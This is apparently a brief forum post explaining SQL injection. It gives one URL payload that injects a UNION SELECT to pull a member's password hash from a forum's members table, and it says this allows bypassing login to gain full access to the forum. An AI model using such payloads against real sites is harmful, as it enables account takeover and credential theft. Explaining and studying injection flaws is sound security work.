If I was to make use of an SQL Injection it means I can insert/execute commands directly into the database - for example in a url I could do
Code:
pirate.pa.forum/index.php?par=2%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=1
It's powerful enough that I can bypass the actual login process based on a hash and its associated memberid - and thus, gain complete access to a forum.